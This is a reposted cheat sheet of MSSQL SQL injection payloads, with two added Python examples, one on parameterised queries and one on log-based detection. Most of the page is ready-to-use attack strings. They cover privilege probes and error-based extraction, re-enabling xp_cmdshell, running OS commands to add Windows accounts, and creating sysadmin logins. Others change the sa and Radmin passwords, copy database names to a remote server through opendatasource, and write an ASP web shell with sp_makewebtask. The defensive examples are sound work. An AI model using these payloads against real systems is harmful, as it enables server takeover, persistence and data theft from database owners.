Some injection commands commonly used by SQL injection tools (MSSQL)

Source: Internet
Author: User

// Check permissions (membership of db_owner). In a URL the "+" below is sent encoded as %2b.
and 1=(select is_member('db_owner'))
and char(124)+cast(is_member('db_owner') as varchar(1))+char(124)=1;--

// Check whether the current login can access the master database
and 1=(select has_dbaccess('master'))
and char(124)+cast(has_dbaccess('master') as varchar(1))+char(124)=1 --

Numeric type (unquoted parameter)
and char(124)+user+char(124)=0

Character type (quoted parameter)
' and char(124)+user+char(124)=0 and ''='

Search type (parameter inside LIKE '%...%')
' and char(124)+user+char(124)=0 and '%'='

Reveal the current user name (through the conversion error)
and user>0
' and user>0 and ''='
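The three payload shapes above (numeric, character, search type) differ only in how the injected text lands inside the application's SQL string. The following added example, which is not from the original page, shows the mechanism and the fix: a query built by string concatenation leaks the truth of an "and 1=(select ...)" subquery through the row count, while the same query with bound parameters returns nothing for any of the probes. It assumes sqlite3 in place of MSSQL, and the products table, its rows and all function names are constructed for the demo.

```python
# Added example, not part of the original page: shows why the "numeric",
# "character" and "search type" payload shapes above work against a query
# built by string concatenation, and that a parameterised query defeats all of
# them. Assumptions (constructed for this demo): sqlite3 stands in for MSSQL,
# and the products table, its rows and the function names are invented here.
import sqlite3


def build_db():
    """Create an in-memory table with one column the probes try to infer."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, secret TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "widget", "s3cret"), (2, "gadget", "h1dden")])
    return con


def lookup_concat(con, product_id, name):
    """Deliberately vulnerable: request values are spliced into the SQL text.

    id is unquoted (the page's 'numeric type'), name sits inside LIKE '%...%'
    (the 'search type'); a plain quoted string would be the 'character type'.
    """
    sql = ("SELECT id, name FROM products WHERE id = " + product_id +
           " AND name LIKE '%" + name + "%'")
    return con.execute(sql).fetchall()


def lookup_param(con, product_id, name):
    """Hardened: same query, values bound as parameters, never parsed as SQL."""
    sql = "SELECT id, name FROM products WHERE id = ? AND name LIKE ?"
    return con.execute(sql, (product_id, "%" + name + "%")).fetchall()


def run_probes():
    """Send a true and a false boolean probe through both code paths.

    Returns, per path, the row counts for (true probe, false probe). A pair that
    differs means the caller can read the answer to the subquery one bit at a
    time; (0, 0) means the input was treated as data only.
    """
    con = build_db()
    true_sub = "(select count(*) from products where secret like 's%')"   # 1 row
    false_sub = "(select count(*) from products where secret like 'x%')"  # 0 rows
    numeric_true = "1 and 1=" + true_sub          # 'and 1=(select ...)' as on the page
    numeric_false = "1 and 1=" + false_sub
    search_true = "' and 1=" + true_sub + " and '%'='"    # closes the LIKE quote
    search_false = "' and 1=" + false_sub + " and '%'='"
    return {
        "concat_numeric": (len(lookup_concat(con, numeric_true, "")),
                           len(lookup_concat(con, numeric_false, ""))),
        "concat_search": (len(lookup_concat(con, "1", search_true)),
                          len(lookup_concat(con, "1", search_false))),
        "param_numeric": (len(lookup_param(con, numeric_true, "")),
                          len(lookup_param(con, numeric_false, ""))),
        "param_search": (len(lookup_param(con, "1", search_true)),
                         len(lookup_param(con, "1", search_false))),
    }


if __name__ == "__main__":
    for path, (yes, no) in run_probes().items():
        print(path, "true-probe rows:", yes, "false-probe rows:", no)
```

The concatenated paths answer (1, 0): the row count changes with the truth of the subquery, which is exactly what the probes on this page rely on. The parameterised paths answer (0, 0) because the whole payload is compared as a value; the numeric probe never becomes a number and the search probe is just an unmatched LIKE pattern.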

Check whether the login is a member of sysadmin (sa-level); the hex literal is N'sysadmin' in UTF-16LE
and 1=(select is_srvrolemember('sysadmin'));--
and char(124)+cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))+char(124)=1 --

Check whether the back end is MSSQL
and exists(select * from sysobjects);--

Check whether stacked (multiple) statements are supported
;declare @d int;--

Restore xp_cmdshell
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafsp','select @@version')

//-----------------------
// Execute a command (through the Jet OLE DB provider)
//-----------------------
First, set the Jet SandBoxMode registry value:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

Then run the system command through Jet OLE DB:
select * from openrowset('Microsoft.Jet.OLEDB.4.0',';database=c:\winnt\system32\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

Execute a command through OLE Automation (sp_OACreate / sp_OAMethod)
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user paf pafpaf /add';--

exec [master].[dbo].[xp_cmdshell] 'cmd /c md c:\8080'

Determine whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
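Every payload in the probing section above and in the command-execution section is visible in the web server's access log as a URL-encoded query string, where "+" arrives as %2b and spaces as %20 (the "% 2 b" residue throughout this page is that encoding). The following added example, not part of the original page, decodes the query string the way the server does and matches it against one signature per payload family on this page. The log field layout, the sample lines and the signature labels are constructed for the demo; a real IIS W3C log has more fields, so adjust LOG_FIELDS to the #Fields line of the log being scanned.

```python
# Added example, not part of the original page: flags the MSSQL probing and
# command-execution payloads listed above in web-server access logs.
# Assumptions (constructed for this demo): the log field layout, the sample
# lines, and the signature labels. The detector only looks at cs-uri-query.
import re
from urllib.parse import unquote, unquote_plus

# Field order of the constructed W3C-style log (a cut-down IIS layout).
LOG_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

# (label, regex) pairs applied to the decoded, lower-cased query string.
# Each pattern maps to one family of payloads on this page.
SIGNATURES = [
    ("mssql-permission-probe", r"\b(is_member|has_dbaccess|is_srvrolemember)\s*\("),
    ("mssql-error-based-probe", r"char\(124\)\+|\buser\s*>\s*0\b|\bcast\(.*\bas\s+varchar"),
    ("mssql-fingerprint", r"\bfrom\s+(master\.dbo\.|master\.\.)?sysobjects\b"),
    ("mssql-stacked-query", r";\s*(declare|exec)\s+"),
    ("mssql-xp-procedure", r"\bxp_(cmdshell|regwrite|regread|dirtree|servicecontrol|makecab|unpackcab|terminate_process)\b"),
    ("mssql-ole-automation", r"\bsp_oa(create|method)\b"),
    ("mssql-adhoc-remote", r"\b(openrowset|opendatasource)\s*\("),
    ("mssql-extended-proc-change", r"\bsp_(add|drop)extendedproc\b|\bsp_makewebtask\b"),
]

# Constructed sample log: one benign request, four payloads in the shapes shown
# on this page (URL-encoded as a browser or tool would send them), and one
# benign search whose '+' is an encoded space, not string concatenation.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-05-01 10:00:01 10.0.0.7 GET /display.asp keyno=188 200
2004-05-01 10:00:02 10.0.0.9 GET /display.asp keyno=188%20and%201=(select%20is_member('db_owner')) 500
2004-05-01 10:00:03 10.0.0.9 GET /display.asp keyno=188%20and%20char(124)%2bcast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20varchar(1))%2bchar(124)=1%20-- 500
2004-05-01 10:00:04 10.0.0.9 GET /display.asp keyno=188%20and%201=(select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='X'%20and%20name='xp_cmdshell') 200
2004-05-01 10:00:05 10.0.0.9 GET /display.asp keyno=188;exec%20master..xp_regwrite%20'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;-- 200
2004-05-01 10:00:06 10.0.0.12 GET /search.asp q=widgets+and+gadgets 200
"""


def parse_line(line):
    """Split one log line into a dict, or return None for directives/malformed lines."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split()
    if len(parts) != len(LOG_FIELDS):
        return None
    return dict(zip(LOG_FIELDS, parts))


def normalise(query):
    """Decode the query string the way the web server does, then canonicalise.

    unquote_plus turns %2b into '+' (the T-SQL concatenation these payloads rely
    on) and a bare '+' into a space; a second plain unquote catches one level of
    double encoding (%252b) without touching the '+' restored by the first pass.
    """
    decoded = unquote(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def scan_query(query):
    """Return the labels of every signature that matches the query string."""
    text = normalise(query)
    return [label for label, pattern in SIGNATURES if re.search(pattern, text)]


def scan_log(lines):
    """Run the signatures over each request and collect the hits."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["cs-uri-query"] == "-":
            continue
        labels = scan_query(rec["cs-uri-query"])
        if labels:
            hits.append({"c-ip": rec["c-ip"], "cs-uri-stem": rec["cs-uri-stem"],
                         "query": normalise(rec["cs-uri-query"]), "labels": labels})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["c-ip"], hit["cs-uri-stem"], ", ".join(hit["labels"]))
```

Decoding before matching is the point: a signature written against the raw log would have to know every encoding variant, whereas after decoding the permission probe, the error-based probe (the "char(124)+" marker), the sysobjects fingerprint, the stacked xp_regwrite call and the xp_cmdshell existence check each match a single pattern, and the benign "widgets+and+gadgets" search does not.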

Write registry (value type REG_DWORD here; xp_regwrite also accepts REG_SZ and REG_BINARY)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

Read registry
exec master..xp_regread 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

Read directory contents (depth 1, files included)
exec master..xp_dirtree 'c:\winnt\system32\',1,1

Database backup to a file
backup database pubs to disk='c:\123.bak'

// Reveal the row count of a table (through the conversion error)
and (select char(124)+cast(count(1) as varchar(8000))+char(124) from D99_Tmp)=0;--

To change the sa password, run:
exec sp_password NULL,'newpassword','sa'

Create a login named test and add it to the sysadmin role:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

Delete the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'

Add an extended stored procedure backed by a DLL and make it callable by everyone
exec [master]..sp_addextendedproc 'xp_proxiedadata','c:\winnt\system32\sqllog.dll'
grant exec on xp_proxiedadata to public

Stop or start a service (here the Task Scheduler service).

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

Lists only the subdirectories of a directory.

File details:
xp_getfiledetails 'c:\inetpub\wwwroot\sqlinject\login.asp'

dbo.xp_makecab

Compresses several target files into one .cab file.
The files to compress are appended to the end of the parameter list, separated by commas.

dbo.xp_makecab 'c:\test.cab','mszip',1,
'c:\inetpub\wwwroot\sqlinject\login.asp',
'c:\inetpub\wwwroot\sqlinject\securelogin.asp'

xp_terminate_process

Stops a running program; the process ID must be passed as the parameter.
In Task Manager, choose View > Select Columns to display the PID of each running program.

xp_terminate_process 2484

xp_unpackcab

Extracts the files from a .cab archive.

xp_unpackcab 'c:\test.cab','c:\temp',1

On a machine with Radmin installed, the Radmin password had been changed, regedit.exe could not be found (deleted or renamed) and net.exe did not exist, so there was no way to import a registry file with regedit /e; but MSSQL was running with sa privileges. Running EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','System\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c changes the Radmin password to 12345678. To change the port, EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','System\RAdmin\v2.0\Server\Parameters','Port','REG_BINARY',0xd20400 sets the port to 1234 (0xd20400 is 1234 stored as a little-endian value).

create database lcx;
create table ku (name nvarchar(256) null);
create table biao (id int null, name nvarchar(256) null);

// Obtain the database names (copied out to a remote SQL Server through OpenDataSource)
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

// Create a table in master to check permissions
create table master..d_test (id nvarchar(4000) null, data nvarchar(4000) null);--

Use sp_makewebtask to write a one-line script page directly into the web directory:
http://127.0.0.1/dblogin123.asp?username=123';exec sp_makewebtask 'd:\www\tt\88.asp',' select ''<%execute(request("a"))%>'' ';--

// Update table content
update films set kind='dramatic' where id=123

// Delete content
delete from table_name where stockid=3

Source: http://Jorkin.Reallydo.Com/default.asp?Id=569
